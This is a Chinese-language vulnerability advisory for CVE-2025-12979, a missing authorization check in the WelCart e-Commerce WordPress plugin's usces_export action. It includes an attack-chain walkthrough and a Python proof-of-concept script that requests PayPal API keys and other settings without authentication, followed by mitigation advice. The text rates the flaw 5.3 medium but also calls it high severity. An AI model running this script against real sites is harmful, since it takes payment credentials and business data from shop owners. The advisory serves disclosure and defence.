CVE-2025-12979: WelCart e-Commerce WordPress插件未授权访问漏洞

漏洞信息

漏洞编号

CVE-2025-12979

漏洞类型

越权访问/授权绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WelCart e-Commerce (usc-e-shop) WordPress插件

漏洞概述

CVE-2025-12979是WordPress平台下WelCart e-Commerce插件的一个高危安全漏洞。该插件是日本知名的开源电子商务解决方案，广泛应用于日本市场的WordPress网站搭建在线商店。漏洞根源在于插件的usces_export功能缺少必要的权限验证机制，允许未认证的任意攻击者通过发送特制请求调用该导出功能。攻击者无需任何登录凭据或用户权限，即可非法获取网站运营的核心敏感数据，包括但不限于PayPal等第三方支付接口的API密钥和密钥串、商业合作伙伴的联系信息、邮件通知模板、运费计算规则、库存管理配置以及各类业务运营参数。这些敏感信息一旦泄露，攻击者可进一步利用支付凭证进行金融欺诈、窃取客户支付数据、冒充企业进行钓鱼攻击，或将商业信息出售给竞争对手造成经济损失。鉴于WelCart插件在日本的电商市场份额，该漏洞可能影响大量在线商店的运营安全。

技术细节

该漏洞属于典型的功能级访问控制失效（Broken Access Control）问题。在WelCart e-Commerce插件的usces_export AJAX处理函数中，开发者错误地未对请求来源进行权限验证。正常情况下，导出敏感业务数据的功能应当仅对管理员角色开放，需要检查current_user_can('manage_options')等权限。但代码直接处理请求参数并返回完整数据集。攻击者构造形如wp-admin/admin-ajax.php?action=usces_export的POST或GET请求，指定目标数据类型参数（如payment_settings、mail_templates等），即可触发数据导出。返回数据以JSON或CSV格式包含明文敏感信息。漏洞利用的关键在于usces_export动作钩子未注册任何权限回调，所有请求均被直接处理。攻击者可遍历不同参数值获取完整数据资产，且日志中仅记录AJAX请求而不显示具体导出内容，增加了检测难度。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站是否使用WordPress及WelCart e-Commerce插件，通过检查页面特征或XML-RPC接口探测插件存在性

STEP 2

步骤2: 构造恶意请求

攻击者构造针对wp-admin/admin-ajax.php的AJAX请求，将action参数设置为usces_export，并指定目标数据类型如payment_settings

STEP 3

步骤3: 发送未授权请求

攻击者直接发送HTTP请求到目标站点，无需提供任何认证凭据（Cookie、Token等），利用插件缺失的权限验证机制

STEP 4

步骤4: 获取敏感数据

服务器端直接返回请求的敏感数据，包括PayPal API密钥、商业联系信息、邮件模板等，攻击者获得明文敏感信息

STEP 5

步骤5: 数据利用

攻击者利用获取的支付凭证进行金融欺诈，窃取客户支付信息，或将商业数据出售给竞争对手造成经济损失

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12979 PoC - WelCart e-Commerce Unauthorized Data Export
# Target: WordPress site with WelCart plugin <= 2.11.24

import requests
import sys
import json

target = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com"

# Exploit the missing authorization check on usces_export action
endpoints = [
    "/wp-admin/admin-ajax.php?action=usces_export",
    "/wp-admin/admin-ajax.php",
]

def exploit(target_url):
    """Attempt to export sensitive data without authentication"""
    
    # Data types that can be exported due to missing auth check
    data_types = [
        "payment_settings",
        "mail_templates",
        "business_contact",
        "shipping_config",
        "api_credentials",
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-12979: Missing authorization check")
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        
        for data_type in data_types:
            try:
                # Send request without any authentication
                data = {
                    "action": "usces_export",
                    "usces_export_type": data_type,
                }
                
                response = requests.post(url, data=data, timeout=10, verify=False)
                
                if response.status_code == 200:
                    # Check if sensitive data was returned
                    if "api" in response.text.lower() or "secret" in response.text.lower() or "credential" in response.text.lower():
                        print(f"[+] VULNERABLE! Exported {data_type} data:")
                        print(response.text[:500])
                        return True
                    elif "nonce" not in response.text.lower():  # No auth required
                        print(f"[+] Potentially vulnerable - {data_type}")
                        
            except requests.RequestException as e:
                print(f"[-] Error: {e}")
                
    return False

if __name__ == "__main__":
    exploit(target)

影响范围

WelCart e-Commerce (usc-e-shop) <= 2.11.24

防御指南

临时缓解措施

在官方补丁发布前，可通过以下方式临时缓解：1) 使用Web应用防火墙（WAF）规则拦截包含action=usces_export的异常请求；2) 在主题functions.php中临时添加权限检查钩子；3) 限制wp-admin/admin-ajax.php的访问频率和来源IP；4) 定期更换所有第三方支付API密钥；5) 监控服务器访问日志中异常的AJAX请求模式。建议尽快升级到官方发布的安全版本。